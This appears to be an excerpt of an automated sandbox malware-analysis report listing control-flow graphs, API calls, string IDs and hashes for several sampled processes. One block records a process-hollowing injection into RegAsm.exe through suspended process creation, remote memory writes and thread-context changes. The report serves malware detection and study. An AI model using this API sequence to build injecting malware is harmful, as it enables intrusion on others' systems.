                                                                                                                                                                                                                                          • Instruction ID: 9c307c8fbdf2cd3d70a3a1b0e3ad546656b564a80232e6d09e0553c610d6b1a0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c114d9144606b4ba0a01e017864587d0f1b653a5ecf7bc4926b4020e0a28516
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FA216A71809388CFDB11DFA9C4907DEBFF0EF0A224F14809AD454AB251D378A948CFA6

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 132 d70510-d71006 VirtualProtect 135 d7100d-d71021 132->135 136 d71008 132->136 136->135
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(037B3590,?,?,?,?,?,?,?,?,00000000,00000000,?,00D70A78,00000001,00000040), ref: 00D70FF9
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1706998492.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_d70000_RK8ajtyf9pvKlaXEo3EjTbnu.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                                                                          • Opcode ID: 8453177e024463b79cb0fa60798af43ca3e45d926a381499c68927ade9881493
                                                                                                                                                                                                                                          • Instruction ID: 353aebf81ed731a9f9aa8d4d207ce27301addc914d5799b6745b91f1d3bedd2c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8453177e024463b79cb0fa60798af43ca3e45d926a381499c68927ade9881493
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F21E0B5905259AFCB10CF9AD884ADEFBB4FB08310F10812AE918A7240D3B4A954CFA5

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 137 d70504-d70b39 FreeConsole 140 d70b40-d70b54 137->140 141 d70b3b 137->141 141->140
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1706998492.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_d70000_RK8ajtyf9pvKlaXEo3EjTbnu.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ConsoleFree
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 771614528-0
                                                                                                                                                                                                                                          • Opcode ID: ed77779e3aa85501c843d25c5a366edffc80942aa6150fbdf8027180c13df449
                                                                                                                                                                                                                                          • Instruction ID: ad91728f4fdf20ebe8e2cb5572896b5ed5128c4284ad78845e9880b62ffaf140
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ed77779e3aa85501c843d25c5a366edffc80942aa6150fbdf8027180c13df449
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FA1112B4804748CFCB20DF9AD485BDEBBF4EB08324F208069D529A7380D375AA44CFA1

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 142 d70ac9-d70b07 143 d70b0f-d70b39 FreeConsole 142->143 144 d70b40-d70b54 143->144 145 d70b3b 143->145 145->144
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1706998492.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_d70000_RK8ajtyf9pvKlaXEo3EjTbnu.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ConsoleFree
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 771614528-0
                                                                                                                                                                                                                                          • Opcode ID: 0e30107740e8add265e10073cc711063638a9d404dbf648a45477ab37673bf98
                                                                                                                                                                                                                                          • Instruction ID: 9525dad749ae80f84254e99d55b83896bcfc2d800f75b21ee5b82833d19b3b3a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e30107740e8add265e10073cc711063638a9d404dbf648a45477ab37673bf98
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 241112B5804248CFCB20CF9AD485BEEBFF0EB48314F24855AD469A7690D3796A44CFA1

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 181 d1d005-d1d079 187 d1d0c9-d1d0d1 181->187 188 d1d07b-d1d086 181->188 187->188 189 d1d088-d1d096 188->189 190 d1d0be-d1d0c5 188->190 193 d1d09c 189->193 190->189 195 d1d0c7 190->195 194 d1d09f-d1d0a7 193->194 196 d1d0b7-d1d0bc 194->196 197 d1d0a9-d1d0b1 194->197 195->194 196->197 197->196
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1706750473.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_d1d000_RK8ajtyf9pvKlaXEo3EjTbnu.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: bfbab493d13826e5c31180de65f2c34d18e1118629d59aa0cd739ebe016ed0c1
                                                                                                                                                                                                                                          • Instruction ID: 940a4c4e8f4586553730cc7b97125bb4ad06ac4645891ec2953d6827ea7f0393
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bfbab493d13826e5c31180de65f2c34d18e1118629d59aa0cd739ebe016ed0c1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C31342140E3D05FD7038B24A8A46A27F749F17220F1E80DBD889CF0A7C6699C89C732

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 199 d1d059-d1d079 200 d1d0c9-d1d0d1 199->200 201 d1d07b-d1d086 199->201 200->201 202 d1d088-d1d096 201->202 203 d1d0be-d1d0c5 201->203 206 d1d09c 202->206 203->202 208 d1d0c7 203->208 207 d1d09f-d1d0a7 206->207 209 d1d0b7-d1d0bc 207->209 210 d1d0a9-d1d0b1 207->210 208->207 209->210 210->209
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1706750473.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_d1d000_RK8ajtyf9pvKlaXEo3EjTbnu.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 5d29d53db6523d0a75702f369cb0cfa183cde294c452d41c6d5bf4d6d4b9beff
                                                                                                                                                                                                                                          • Instruction ID: 99c687115684079d06815999395c7655ec3ab6bca864afd7176a1ebf1ab54af1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d29d53db6523d0a75702f369cb0cfa183cde294c452d41c6d5bf4d6d4b9beff
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EB01DB7110C344BBE7204A26EC847E7BBD9DF49334F1CC55AED490A286C779D881CA72

                                                                                                                                                                                                                                          Callgraph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          • Opacity -> Relevance
                                                                                                                                                                                                                                          • Disassembly available
                                                                                                                                                                                                                                          callgraph 0 Function_01500450 1 Function_01500154 2 Function_01500054 3 Function_01500254 4 Function_01500354 5 Function_01500B57 62 Function_01500BD0 5->62 6 Function_0150045C 7 Function_01500540 8 Function_01500B40 9 Function_03152605 10 Function_014AD059 11 Function_01500444 12 Function_01500244 13 Function_01500148 14 Function_01500848 15 Function_01500348 16 Function_03152809 17 Function_01500070 18 Function_01500475 19 Function_03152630 20 Function_01500378 21 Function_01500278 22 Function_01500178 23 Function_01500B78 23->62 24 Function_01500479 25 Function_014AD163 26 Function_0315253C 27 Function_0150097A 46 Function_01500500 27->46 49 Function_0150050C 27->49 73 Function_015004F4 27->73 28 Function_0150047D 29 Function_01500060 30 Function_01500260 31 Function_01500360 32 Function_01500562 33 Function_01500165 34 Function_01500468 35 Function_0150026C 36 Function_0150036C 37 Function_01501010 38 Function_01500214 39 Function_01500318 40 Function_01500519 41 Function_0150011C 42 Function_014AD006 43 Function_0150051D 44 Function_01500300 45 Function_01500100 47 Function_01500006 48 Function_01500208 50 Function_0150010C 51 Function_0150030C 52 Function_01500330 53 Function_01500434 54 Function_01500234 55 Function_0150033C 56 Function_0150013C 57 Function_01500521 58 Function_01500224 59 Function_01500324 60 Function_01500525 61 Function_0150012C 63 Function_015002D0 64 Function_015000D4 65 Function_015001D5 66 Function_015008D8 67 Function_015002DC 68 Function_015001C0 69 Function_015002C4 70 Function_015000C8 71 Function_03152588 72 Function_015000F0 74 Function_015002F4 75 Function_015001F8 76 Function_014AD0E0 77 Function_014AD0E1 78 Function_031525B8 79 Function_031521A5 80 Function_015000E4 81 Function_015008E8 82 Function_015002E8 83 Function_01500090 84 Function_01500390 85 Function_01500491 86 Function_01500495 87 Function_014AD18C 88 Function_01500198 89 Function_01500499 90 Function_0150039C 91 Function_0150049D 92 Function_0150029D 93 Function_014AD187 94 Function_01500080 95 Function_01500481 96 Function_01500284 97 Function_01500384 98 Function_01500485 99 Function_01500988 99->46 99->49 99->73 100 Function_01500188 101 Function_01500489 102 Function_0150048D 103 Function_031525C8 104 Function_015000B0 105 Function_015002B4 106 Function_015001B4 107 Function_015004B8 108 Function_031525FD 109 Function_015000BC 110 Function_015000A0 111 Function_031526E1 112 Function_031525E0 113 Function_015001A8

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,03152117,03152107), ref: 03152314
                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 03152327
                                                                                                                                                                                                                                          • Wow64GetThreadContext.KERNEL32(000003A8,00000000), ref: 03152345
                                                                                                                                                                                                                                          • ReadProcessMemory.KERNELBASE(000003AC,?,0315215B,00000004,00000000), ref: 03152369
                                                                                                                                                                                                                                          • VirtualAllocEx.KERNELBASE(000003AC,?,?,00003000,00000040), ref: 03152394
                                                                                                                                                                                                                                          • WriteProcessMemory.KERNELBASE(000003AC,00000000,?,?,00000000,?), ref: 031523EC
                                                                                                                                                                                                                                          • WriteProcessMemory.KERNELBASE(000003AC,00400000,?,?,00000000,?,00000028), ref: 03152437
                                                                                                                                                                                                                                          • WriteProcessMemory.KERNELBASE(000003AC,?,?,00000004,00000000), ref: 03152475
                                                                                                                                                                                                                                          • Wow64SetThreadContext.KERNEL32(000003A8,03110000), ref: 031524B1
                                                                                                                                                                                                                                          • ResumeThread.KERNELBASE(000003A8), ref: 031524C0
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1735076126.0000000003152000.00000040.00000800.00020000.00000000.sdmp, Offset: 03152000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_3152000_kCxbYlQ2A6NZXLbKZjtnUx3R.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                                                                                                                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                                                                                                                                                          • API String ID: 2687962208-1257834847
                                                                                                                                                                                                                                          • Opcode ID: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
                                                                                                                                                                                                                                          • Instruction ID: 4f2a2c69e6f0f9a04247fee18bc319440fb4de14eebaf2847e89dc71733a3fb1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2B1E67660024AAFDB60CF68CC80BDA77A5FF8C714F158564EA1CAB341D774FA418B94

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 23 1500bd0-1500c37 26 1500cd8-1500ce6 23->26 27 1500c3d-1500c40 23->27 28 1500da2-1500db8 26->28 29 1500cec-1500cf4 26->29 32 1500c48-1500c56 27->32 33 1500f3c-1500f43 28->33 34 1500dbe-1500ddc 28->34 30 1500f46-1500fe6 VirtualProtect 29->30 31 1500cfa-1500d0d 29->31 48 1500fe8 30->48 49 1500fed-1501001 30->49 31->30 35 1500d13-1500d1f 31->35 32->30 43 1500c5c-1500ca7 32->43 36 1500de5-1500df0 34->36 37 1500dde-1500de4 34->37 40 1500d21-1500d27 35->40 41 1500d28-1500d59 35->41 36->30 38 1500df6-1500e02 36->38 37->36 44 1500e04-1500e0a 38->44 45 1500e0b-1500e12 38->45 40->41 41->30 47 1500d5f-1500d69 41->47 43->30 50 1500cad-1500cbe 43->50 44->45 45->30 51 1500e18-1500e22 45->51 47->30 52 1500d6f-1500d79 47->52 48->49 50->30 53 1500cc4-1500cd2 50->53 51->30 54 1500e28-1500e32 51->54 52->30 55 1500d7f-1500d85 52->55 53->26 53->27 54->30 56 1500e38-1500e3e 54->56 55->30 57 1500d8b-1500d9c 55->57 56->30 58 1500e44-1500e50 56->58 57->28 57->29 58->30 59 1500e56-1500e67 58->59 60 1500e70-1500eb5 59->60 61 1500e69-1500e6f 59->61 66 1500ebd-1500eef 60->66 61->60 69 1500ef1-1500efa 66->69 70 1500f05-1500f1c 66->70 69->70 71 1500efc-1500f03 69->71 72 1500f27-1500f36 70->72 71->72 72->33 72->34
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(04153590,?,00000001,0000012C,?,?,?,00000000,00000000,?,01500A73,00000001,00000040), ref: 01500FD9
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1656701406.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_1500000_kCxbYlQ2A6NZXLbKZjtnUx3R.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                                          • String ID: &S!$<1i;
                                                                                                                                                                                                                                          • API String ID: 544645111-1770337207
                                                                                                                                                                                                                                          • Opcode ID: 64276c635c9864e68ed77f7ac71665a944c7326682eb3ca01d66998daae37a7d
                                                                                                                                                                                                                                          • Instruction ID: 8f861d3f5552da94c6835e45e42447e61310031b4b97f22b4a5e6a9cdb4988b6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 64276c635c9864e68ed77f7ac71665a944c7326682eb3ca01d66998daae37a7d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FEC17E70A042598FCB12CFA9C5807EDFBF1BF49314F648599E858AB286C734AD41CFA4

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 74 1500500-1500fe6 VirtualProtect 77 1500fe8 74->77 78 1500fed-1501001 74->78 77->78
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(04153590,?,00000001,0000012C,?,?,?,00000000,00000000,?,01500A73,00000001,00000040), ref: 01500FD9
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1656701406.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_1500000_kCxbYlQ2A6NZXLbKZjtnUx3R.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                                                                          • Opcode ID: 508f7455fee16fb465a72b2a9d05aa8b98928c2cd43f220c9380df3e1b903385
                                                                                                                                                                                                                                          • Instruction ID: f7dd8735b9cb065d077391a60f08234630296b99b8a17b06efa5d487ccfa7920
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 508f7455fee16fb465a72b2a9d05aa8b98928c2cd43f220c9380df3e1b903385
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6321C3B590565DAFCB00DF9AD884BDEFBB4FB48314F10812AE918A7240C374A954CFA5

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 141 14ad006-14ad013 142 14ad014-14ad049 141->142 142->142 143 14ad04b-14ad079 142->143 147 14ad07b-14ad086 143->147 148 14ad0c9-14ad0d1 143->148 149 14ad088-14ad096 147->149 150 14ad0be-14ad0c5 147->150 148->147 153 14ad09c 149->153 150->149 154 14ad0c7 150->154 155 14ad09f-14ad0a7 153->155 154->155 156 14ad0a9-14ad0b1 155->156 157 14ad0b7-14ad0bc 155->157 156->157 157->156
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1656275196.00000000014AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014AD000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_14ad000_kCxbYlQ2A6NZXLbKZjtnUx3R.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: b77ba39725006eed8b797d86adc5c02cb613c057b7e24744ca5a2192364bab46
                                                                                                                                                                                                                                          • Instruction ID: d9cc8667a0c75904f1245948f229afc344b872e1861bb9315b997981bc032e15
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b77ba39725006eed8b797d86adc5c02cb613c057b7e24744ca5a2192364bab46
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E721FFA154E3D09FD7138B258CA4652BF78AF53224F4E80DBD888CF5B7C2694849CB72

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 168 14ad059-14ad079 169 14ad07b-14ad086 168->169 170 14ad0c9-14ad0d1 168->170 171 14ad088-14ad096 169->171 172 14ad0be-14ad0c5 169->172 170->169 175 14ad09c 171->175 172->171 176 14ad0c7 172->176 177 14ad09f-14ad0a7 175->177 176->177 178 14ad0a9-14ad0b1 177->178 179 14ad0b7-14ad0bc 177->179 178->179 179->178
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1656275196.00000000014AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014AD000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_14ad000_kCxbYlQ2A6NZXLbKZjtnUx3R.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 83db2d1396d224ac74131ad8c0438ceb2da6ad72fb2d36d76083a3e29d5aff49
                                                                                                                                                                                                                                          • Instruction ID: 05c8c1a5c755a0b6368423cf55dee9e58d296d73426c43b1c89ac8aebffc4ef9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 83db2d1396d224ac74131ad8c0438ceb2da6ad72fb2d36d76083a3e29d5aff49
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B012BB194C304EBE7204B65DC84767BFD8DF61278F58C41BED080A6A7C3759441CAB2

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000F.00000002.2154192327.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154165853.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154283981.0000000000525000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154339002.00000000005A8000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154361694.00000000005AA000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154452037.00000000005AB000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154474637.00000000005B2000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154518138.00000000005CA000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154563942.0000000000633000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154599755.0000000000664000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154599755.0000000000666000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154651763.000000000066A000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154675812.0000000000673000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154697515.0000000000676000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154721890.000000000067D000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154745993.0000000000680000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154767280.0000000000689000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154791817.000000000068E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154906339.00000000006BC000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154930760.00000000006C0000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_400000_h687rYoqxN2Ss_wvNXD9qqhf.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 3849$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                                                                                                                                                                                                                          • API String ID: 0-829924176
                                                                                                                                                                                                                                          • Opcode ID: 8a0d27ef46159b5c9f57bcb0f393f7e027e7c54a539802678ae75c04171ea4d9
                                                                                                                                                                                                                                          • Instruction ID: c3c3b3738dbee97888d9377540ecd2a8c239df3a19c682bddb3ac86f50dd1e95
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a0d27ef46159b5c9f57bcb0f393f7e027e7c54a539802678ae75c04171ea4d9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B80236B1D092A89AF7208B24DC447EA7BB5EF51304F0441FAC84DA7282D67E5FC5CB96

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000F.00000002.2154192327.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154165853.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154283981.0000000000525000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154339002.00000000005A8000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154361694.00000000005AA000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154452037.00000000005AB000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154474637.00000000005B2000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154518138.00000000005CA000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154563942.0000000000633000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154599755.0000000000664000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154599755.0000000000666000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154651763.000000000066A000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154675812.0000000000673000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154697515.0000000000676000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154721890.000000000067D000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154745993.0000000000680000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154767280.0000000000689000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154791817.000000000068E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154906339.00000000006BC000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154930760.00000000006C0000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_400000_h687rYoqxN2Ss_wvNXD9qqhf.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 3849$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                                                                                                                                                                                                                          • API String ID: 0-829924176
                                                                                                                                                                                                                                          • Opcode ID: 9670bfd42258927fdb95e3d79b8bed6cdd768bc71171ca6a6b04db4d8a0a82c7
                                                                                                                                                                                                                                          • Instruction ID: 2f17bd28fb04ae39e4b9f93a89fb21d0b7bf282c4a203d9e66a8694fb2e18a0c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9670bfd42258927fdb95e3d79b8bed6cdd768bc71171ca6a6b04db4d8a0a82c7
